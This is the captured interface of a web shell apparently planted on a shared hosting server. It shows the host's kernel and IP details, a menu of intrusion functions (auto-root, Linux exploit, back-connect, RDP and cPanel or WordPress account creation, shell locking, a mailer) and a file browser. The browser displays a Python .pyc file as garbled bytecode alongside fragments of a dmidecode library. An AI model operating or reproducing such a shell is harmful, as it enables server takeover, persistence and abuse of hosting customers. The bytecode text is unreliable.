Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib64 /
python3.6 /
site-packages /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
dmidecode.cpython-36.opt-1.pyc
1.85
KB
-rw-r--r--
dmidecode.cpython-36.pyc
1.85
KB
-rw-r--r--
drv_libxml2.cpython-36.opt-1.p...
9.17
KB
-rw-r--r--
drv_libxml2.cpython-36.pyc
9.17
KB
-rw-r--r--
libxml2.cpython-36.opt-1.pyc
381.36
KB
-rw-r--r--
libxml2.cpython-36.pyc
381.36
KB
-rw-r--r--
snack.cpython-36.opt-1.pyc
33.53
KB
-rw-r--r--
snack.cpython-36.pyc
33.53
KB
-rw-r--r--
unbound.cpython-36.opt-1.pyc
51.2
KB
-rw-r--r--
unbound.cpython-36.pyc
51.2
KB
-rw-r--r--
unboundmodule.cpython-36.opt-1...
68.16
KB
-rw-r--r--
unboundmodule.cpython-36.pyc
68.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dmidecode.cpython-36.opt-1.pyc
3 ��uc� � @ s* d dl Z d dlT dZdZG dd� d�ZdS )� N)�*�n�dc @ s0 e Zd ZdZdd� Zdd� Zdd� Zdd � Zd S )�dmidecodeXMLz=Native Python API for retrieving dmidecode information as XMLc C s t | _d S )N)�DMIXML_NODE�restype)�self� r �!/usr/lib64/python3.6/dmidecode.py�__init__% s zdmidecodeXML.__init__c C s, |t krt | _n|tkr t| _ntd��dS )z� Sets the result type of queries. The value can be DMIXML_NODE or DMIXML_DOC, which will return an libxml2::xmlNode or libxml2::xmlDoc object, respectively zInvalid result type valueT)r r � DMIXML_DOC� TypeError)r �typer r r � SetResultType( s zdmidecodeXML.SetResultTypec C sT | j tkr$tjtd| j |d�d�}n,| j tkrHtjtd| j |d�d�}ntd��|S )z� Queries the DMI data structure for a given section name. A section can often contain several DMI type elements �s)� query_type�result_typeZsection)�_objzInvalid result type value)r r �libxml2�xmlNode�xmlapir �xmlDocr )r Zsectname�retr r r �QuerySection6 s zdmidecodeXML.QuerySectionc C sT | j tkr$tjtd| j |d�d�}n,| j tkrHtjtd| j |d�d�}ntd��|S )zI Queries the DMI data structure for a specific DMI type. �t)r r Ztypeid)r zInvalid result type value)r r r r r r r r )r Ztpidr r r r �QueryTypeIdI s zdmidecodeXML.QueryTypeIdN)�__name__� __module__�__qualname__�__doc__r r r r r r r r r "